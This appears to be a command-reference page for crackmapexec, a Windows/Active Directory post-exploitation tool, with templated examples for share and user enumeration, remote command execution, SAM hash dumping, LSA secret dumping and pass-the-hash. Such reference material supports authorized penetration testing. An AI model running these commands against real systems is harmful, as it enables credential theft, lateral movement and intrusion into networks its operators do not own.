Linux command
crackmapexec command
After copying, replace file names, directories, or parameters as needed.
Common examples
Enumerate SMB shares
crackmapexec smb [192.168.1.0/24] -u [user] -p [password] --shares
Check credentials
crackmapexec smb [hosts.txt] -u [user] -p [password]
Execute command
crackmapexec smb [target] -u [user] -p [password] -x "[whoami]"
Dump SAM hashes
crackmapexec smb [target] -u [admin] -p [password] --sam
Pass the hash
crackmapexec smb [target] -u [user] -H [ntlm_hash]
Enumerate users
crackmapexec smb [target] -u [user] -p [password] --users
Description
crackmapexec (CME) is a post-exploitation tool for penetration testing Windows/Active Directory environments. It automates common tasks like credential validation, share enumeration, and command execution across multiple hosts. The tool supports SMB, WinRM, LDAP, MSSQL, and SSH protocols. It's designed for authorized security assessments and red team operations.
Parameters
- -u _user_: Username for authentication.
- -p _password_: Password for authentication.
- -H _hash_: NTLM hash for pass-the-hash.
- -d _domain_: Domain name.
- -x _command_: Execute command.
- -X _command_: Execute PowerShell command.
- --shares: Enumerate SMB shares.
- --users: Enumerate domain users.
- --sam: Dump SAM database.
- --lsa: Dump LSA secrets.
- --local-auth: Use local authentication.
- -M _module_: Run specific module.
FAQ
What is the crackmapexec command used for?
crackmapexec (CME) is a post-exploitation tool for penetration testing Windows/Active Directory environments. It automates common tasks like credential validation, share enumeration, and command execution across multiple hosts. The tool supports SMB, WinRM, LDAP, MSSQL, and SSH protocols. It's designed for authorized security assessments and red team operations.
How do I run a basic crackmapexec example?
Run `crackmapexec smb [192.168.1.0/24] -u [user] -p [password] --shares` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -u _user_ do in crackmapexec?
Username for authentication.